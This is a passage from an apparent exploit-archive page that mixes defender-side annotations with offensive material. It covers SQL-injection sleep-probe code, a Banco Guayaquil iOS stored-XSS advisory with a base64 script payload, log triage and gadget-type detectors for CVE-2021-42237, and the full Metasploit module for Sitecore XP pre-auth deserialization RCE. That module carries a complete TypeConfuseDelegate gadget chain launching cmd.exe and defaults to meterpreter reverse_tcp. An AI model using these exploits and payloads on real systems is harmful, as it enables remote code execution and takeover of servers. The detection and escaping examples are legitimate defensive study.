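        list_logs_vulnerable(db, col)
    except sqlite3.OperationalError as e:
        return str(e)
    return None


def time_based_probe(send, delays=(0, 1, 5), slack=0.2):
    """send(payload) issues one request; the probe times it. Injection is
    confirmed when every sleep(n) request takes at least n seconds (minus
    slack for jitter) longer than the sleep(0) baseline."""
    timings = {}
    for n in delays:
        payload = "entry_date and (select * from(select(sleep(%g)))a)" % n
        t0 = time.monotonic()
        send(payload)
        timings[n] = time.monotonic() - t0
    base = timings[delays[0]]
    confirmed = all(timings[n] - base >= n - slack for n in delays[1:])
    return confirmed, timings


def simulated_sleep_target(payload):
    """Constructed stand-in for a vulnerable endpoint: it honours sleep(n)
    in the payload the way MySQL's SLEEP() would, so the probe runs offline."""
    m = re.search(r"sleep\(([\d.]+)\)", payload)
    time.sleep(float(m.group(1)) if m else 0)


if __name__ == "__main__":
    db = _db()
    payload = "entry_date and (select * from(select(sleep(1)))a)"
    print("engine error from injected col:", error_based_signal(db, payload))
    print("engine error from quote:       ", error_based_signal(db, "entry_date'"))
    try:
        list_logs_safe(db, payload)
    except ValueError as e:
        print("allow-list:", e)
    ok, timings = time_based_probe(simulated_sleep_target, delays=(0, 0.3, 0.6), slack=0.05)
    print("time-based injection confirmed:", ok, {k: round(v, 2) for k, v in timings.items()})
```

The error text is the evidence the Talariax screenshots captured; the Fuel CMS page suppresses errors, so the timing channel is what remains. Measuring more than one delay guards against a single slow response being mistaken for a sleep.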
<pre><code>Document Title:<br />===============<br />Banco Guayaquil Version 8.0.0 iOS - Stored Cross Site Scripting<br /><br />Credits & Authors:<br />==================<br />TaurusOmar - @TaurusOmar_ (whoami@taurusomar.com) [taurusomar.com]<br /><br />Vendor Homepage: https://apps.apple.com/ec/app/banco-guayaquil/id624963066<br />===============<br /><br />Release Date:<br />=============<br />2022-01-21<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation vulnerability in the name value is estimated as medium. (CVSS 3.7)<br /><br /><br />Product & Service Introduction:<br />===============================<br />Official application of Banco Guayaquil to manage your finances and your products with Banco Guayaquil: make transactions from your accounts, pay credit cards, <br />loans and services, access your movements, deposit checks, request checkbooks, block cards, activate or deactivate Internet purchases and much more.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent Vulnerability Laboratory researcher discovered multiple vulnerabilities in the official Banco Guayaquil 8.0.0 application.<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-21: Public Disclosure<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Affected Product(s):<br />====================<br />Readdle<br />Product: Banco Guayaquil - iOS Mobile Application<br /><br /><br />Exploitation Technique:<br />=======================<br />Local<br /><br /><br />Severity Level:<br />===============<br />Low<br /><br /><br />Technical Details & Description:<br />================================<br />An application-side input validation vulnerability has been discovered in the official Banco Guayaquil iOS mobile application.<br />The vulnerability allows a local attacker to inject their own script code as a payload into the application-side of the vulnerable service function or module.<br />The vulnerability exists in the profile name text box: the injected code executes when the app is closed and opened again.<br /><br />Request Method(s):<br /> [+] Import<br /><br />Vulnerable Module(s):<br /> [+] Add Name<br /><br />Vulnerable Parameter(s):<br /> [+] TextBox Name Profile<br /><br />Vulnerable Final(s):<br /> [+] Save Profile<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation vulnerability can be exploited by local attackers with a system user account and without .<br />For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.<br /><br />1. Install the iOS application ( https://apps.apple.com/ec/app/banco-guayaquil/id624963066)<br />2. Add a new profile name with the script payload in the Name text box<br />3. Save the profile<br />4. Close the app<br />5. Open the app again<br />6. Successful reproduction of the persistent vulnerability!<br /><br /><br />Proof of Concept (IMAGES):<br />=======================<br />1. https://i.imgur.com/Cc1VFUf.png<br />2. https://i.imgur.com/r1HWwrs.png<br /><br /><br />Proof of Concept (VIDEO):<br />=======================<br />1. https://imgur.com/a/lQHt1br<br /><br /><br />Payload: Cross Site Scripting<br />============================<br />Payloads that break out of the JS context: <object data>, javascript:alert, <img onerror><br /><br />text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg<br /><br /> <br />#######<br />#<br /># Disclaimer:<br /># This or previous programs are for educational purposes ONLY. Do not use them without permission. <br /># The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages <br /># caused by direct or indirect use of the information or functionality provided by these programs. <br /># The author or any Internet provider bears NO responsibility for content or misuse of these programs <br /># or any derivatives thereof. By using these programs you accept the fact that any damage (data loss, <br /># system crash, system compromise, etc.) caused by the use of these programs is not Taurus Omar's <br /># responsibility.<br />#<br />#######<br /></code></pre>
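An added example for the two stored-XSS reports on this page (the WordPress "Contact Form to Email" form name and the Banco Guayaquil profile name above), not code from either vendor or advisory. It decodes the data-URI payload listed in the Banco Guayaquil report, shows the difference between rendering a stored name raw and HTML-encoding it, and flags values that carry the markers both reports rely on. The h1 fragment standing in for the real views and the marker list are assumptions.

```python
import base64
import html
import re

# Payload exactly as listed in the Banco Guayaquil advisory (no base64 padding).
DATA_URI_PAYLOAD = "text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg"

# Markers from the advisories' "breaks JS context" list plus the script tag
# used in the WordPress report. Assumed list; a triage aid, not a filter.
XSS_MARKERS = re.compile(r"<\s*(script|img|object|svg|iframe)\b|javascript:|on\w+\s*=", re.I)


def decode_data_uri(uri):
    """Turn 'mime;base64,<data>' into (mime, decoded text). The advisory's
    payload omits the '=' padding, which base64.b64decode requires."""
    meta, _, data = uri.partition(",")
    mime = meta.split(";")[0]
    if "base64" in meta:
        data += "=" * (-len(data) % 4)
        return mime, base64.b64decode(data).decode("utf-8", "replace")
    return mime, data


def render_name_unsafe(name):
    """Stored value dropped straight into markup: the flaw both reports describe."""
    return "<h1>%s</h1>" % name


def render_name_safe(name):
    """Same view with output encoding for an HTML text context; the browser
    shows the angle brackets literally instead of parsing them."""
    return "<h1>%s</h1>" % html.escape(name, quote=True)


def looks_like_xss(value):
    """True if the stored value contains script-capable markup."""
    return bool(XSS_MARKERS.search(value))


if __name__ == "__main__":
    mime, body = decode_data_uri(DATA_URI_PAYLOAD)
    print("decoded %s payload: %s" % (mime, body))
    for name in ["Juan Perez", "<script>alert(1)</script>", body]:
        print("%-40r xss=%s" % (name, looks_like_xss(name)))
        print("   unsafe:", render_name_unsafe(name))
        print("   safe:  ", render_name_safe(name))
```

html.escape() is the right fix only for a value that lands in HTML text or a quoted attribute; the data-URI form of the second payload is a reminder that a value placed in a URL, a src attribute or a script block needs the encoding of that context instead.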
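IIS log triage for the Sitecore XP Metasploit module that follows on this page (CVE-2021-42237), whose Notes flag IOC_IN_LOGS: every attempt goes through a request to /sitecore/shell/ClientBin/Reporting/Report.ashx, the handler where the unauthenticated deserialization happens. Added example, not part of the module or of Sitecore. The log lines are constructed, and the field layout is the IIS default W3C set (an assumption); the parser reads the #Fields header, so a site with a different layout works as long as the header is present.

```python
REPORT_HANDLER = "/sitecore/shell/clientbin/reporting/report.ashx"

# Constructed IIS W3C log excerpt: one benign request, one hit on the
# vulnerable handler, one login page request.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-11-03 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-11-03 10:00:01 10.0.0.5 GET / - 443 - 198.51.100.7 Mozilla/5.0 - 200 0 0 15
2021-11-03 10:00:09 10.0.0.5 POST /sitecore/shell/ClientBin/Reporting/Report.ashx - 443 - 198.51.100.7 Mozilla/5.0 - 500 0 0 1203
2021-11-03 10:00:10 10.0.0.5 GET /sitecore/login - 443 - 203.0.113.9 Mozilla/5.0 - 200 0 0 30
"""


def parse_iis_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def report_ashx_requests(text):
    """(timestamp, client ip, method, status) for every request that reached
    the vulnerable handler. The handler also serves the product's own
    reporting UI, so confirm the client IP and status before escalating."""
    hits = []
    for rec in parse_iis_w3c(text):
        if rec["cs-uri-stem"].lower() == REPORT_HANDLER: 
            hits.append((rec["date"] + " " + rec["time"], rec["c-ip"],
                         rec["cs-method"], rec["sc-status"]))
    return hits


if __name__ == "__main__":
    for when, ip, method, status in report_ashx_requests(SAMPLE_LOG):
        print("%s %s %s Report.ashx -> %s" % (when, ip, method, status))
```

A POST from an address that never authenticated to the Sitecore shell, or a burst of 500s on this path, is the shape to look for; the module's check() alone is a GET that leaves a 200 in the same log.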
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Powershell<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sitecore Experience Platform (XP) PreAuth Deserialization RCE',<br /> 'Description' => %q{<br /> This module exploits a deserialization vulnerability in the Report.ashx page<br /> of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.<br /> Versions 7.2.6 and earlier and 9.0 and later are not affected.<br /><br /> The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll<br /> under the Sitecore.sitecore.shell.ClientBin.Reporting.Report definition, having a ProcessRequest()<br /> handler that calls ProcessReport() with the context of the attacker's request without properly<br /> checking if the attacker is authenticated or not.<br /><br /> This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will<br /> end up calling the DeserializeParameters() function of<br /> Sitecore.Analytics.Reporting.ReportDataSerializer, if a "parameters" XML tag is found in<br /> the attacker's request.<br /><br /> Then for each subelement named "parameter", the code will check that it has a name and<br /> if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is<br /> vulnerable to deserialization attacks and can be trivially exploited by using the<br /> TypeConfuseDelegate gadget chain.<br /><br /> By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user<br /> that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4<br /> of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.<br /> },<br /> 'Author' => [<br /> 'AssetNote', # Discovery and exploit<br /> 'gwillcox-r7' # Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-42237'],<br /> ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],<br /> ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],<br /> ],<br /> 'DisclosureDate' => '2021-11-02',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false, # Gains NT AUTHORITY\NETWORK SERVICE privileges. Possible to elevate to SYSTEM but this isn't done automatically.<br /> 'Targets' => [<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'PowerShell Stager',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :psh_stager,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> unless res.code == 200 && res.body.include?('Sitecore.Analytics.Reporting.ReportDataSerializer.DeserializeQuery')<br /> return CheckCode::Safe('Target is not running Sitecore XP or has patched the vulnerability.')<br /> end<br /><br /> return CheckCode::Appears('Report.ashx is accessible and appears to be deserializing data!')<br /> end<br /><br /> def xml_payload(cmd)<br /> %|<parameters><br /> <parameter name=""><br /> <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=b77a5c561934e089"<br /> xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"<br /> xmlns:i="http://www.w3.org/2001/XMLSchema-instance"<br /> xmlns:x="http://www.w3.org/2001/XMLSchema"<br /> xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"><br /> <Count z:Id="2" z:Type="System.Int32" z:Assembly="0"<br /> xmlns="">2</Count><br /> <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"<br /> xmlns=""><br /> <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"<br /> xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"<br /> xmlns:a="http://schemas.datacontract.org/2004/07/System"><br /> <Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"<br /> xmlns=""><br /> <a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly><br /> <a:delegateEntry z:Id="7"><br /> <a:assembly z:Ref="6" i:nil="true"/><br /> <a:delegateEntry i:nil="true"/><br /> <a:methodName z:Id="8">Compare</a:methodName><br /> <a:target i:nil="true"/><br /> <a:targetTypeAssembly z:Ref="6" i:nil="true"/><br /> <a:targetTypeName z:Id="9">System.String</a:targetTypeName><br /> <a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type><br /> </a:delegateEntry><br /> <a:methodName z:Id="11">Start</a:methodName><br /> <a:target i:nil="true"/><br /> <a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly><br /> <a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName><br /> <a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, 
PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type><br /> </Delegate><br /> <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"<br /> xmlns=""<br /> xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><br /> <Name z:Ref="11" i:nil="true"/><br /> <AssemblyName z:Ref="12" i:nil="true"/><br /> <ClassName z:Ref="13" i:nil="true"/><br /> <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature><br /> <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2><br /> <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType><br /> <GenericArguments i:nil="true"/><br /> </method0><br /> <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"<br /> xmlns=""<br /> xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><br /> <Name z:Ref="8" i:nil="true"/><br /> <AssemblyName z:Ref="6" i:nil="true"/><br /> <ClassName z:Ref="9" i:nil="true"/><br /> <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature><br /> <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2><br /> <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType><br /> <GenericArguments i:nil="true"/><br /> </method1><br /> </_comparison><br /> </Comparer><br /> <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"<br /> xmlns=""><br /> <string z:Id="25"<br /> 
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c #{cmd.encode(xml: :text)}</string><br /> <string z:Id="26"<br /> xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd.exe</string><br /> </Items><br /> </ArrayOfstring><br /> </parameter><br /> </parameters>|<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :win_cmd<br /> print_status('Executing command payload')<br /> execute_command(payload.encoded)<br /> when :win_dropper<br /> execute_cmdstager<br /> when :psh_stager<br /> execute_command(cmd_psh_payload(<br /> payload.encoded,<br /> payload.arch.first,<br /> remove_comspec: true<br /> ))<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx'),<br /> 'ctype' => 'text/xml',<br /> 'data' => xml_payload(cmd)<br /> )<br /> end<br />end<br /></code></pre>
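<p>As an added, defender-side example that is not part of the Metasploit module above nor of Sitecore: a small Ruby triage routine (hypothetical; function and constant names are my own) that flags POST bodies to Report.ashx which declare the delegate and reflection types a TypeConfuseDelegate-style NetDataContractSerializer chain needs. The sample request bodies are constructed, not captured traffic, and the benign one is only a placeholder for an ordinary report query.</p>

```ruby
# Type names that an ordinary Report.ashx query never needs to declare via
# z:Type / z:FactoryType, but which the delegate gadget chain must rebuild.
# (Hypothetical marker list for triage; extend it from your own telemetry.)
GADGET_TYPE_MARKERS = %w[
  DelegateSerializationHolder
  MemberInfoSerializationHolder
  System.Diagnostics.Process
  ComparisonComparer`1
].freeze

REPORT_PATH_SUFFIX = '/sitecore/shell/clientbin/reporting/report.ashx'.freeze

# Every type name a NetDataContractSerializer stream asks to be instantiated.
# A regex is enough for triage; the body is untrusted, so it is never handed
# to a real deserializer here.
def declared_types(body)
  body.scan(/\bz:(?:Type|FactoryType)="([^"]+)"/).flatten
end

# Declared types that match a gadget marker (empty for a benign query).
def gadget_types(body)
  declared_types(body).select { |t| GADGET_TYPE_MARKERS.any? { |m| t.include?(m) } }.uniq
end

# Only POSTs to Report.ashx are in scope; anything declaring gadget types
# gets :suspicious, everything else on that endpoint :benign.
def classify_request(method:, path:, body:)
  return :out_of_scope unless method == 'POST' && path.downcase.end_with?(REPORT_PATH_SUFFIX)

  gadget_types(body).empty? ? :benign : :suspicious
end

# Constructed sample bodies (not real traffic).
BENIGN_BODY = <<~XML
  <parameters>
    <parameter name="query"><string>constructed placeholder query</string></parameter>
  </parameters>
XML

SUSPICIOUS_BODY = <<~XML
  <parameters><parameter name="">
    <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib]]" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
      <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib]]">
        <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder"/>
      </Comparer>
    </ArrayOfstring>
  </parameter></parameters>
XML

if __FILE__ == $PROGRAM_NAME
  puts classify_request(method: 'POST', path: '/sitecore/shell/ClientBin/Reporting/Report.ashx', body: SUSPICIOUS_BODY)
  puts gadget_types(SUSPICIOUS_BODY).inspect
end
```

Running the triage on the constructed suspicious body reports it as `:suspicious` with three matching type declarations, while the placeholder query is `:benign` and a GET to the same path is `:out_of_scope`.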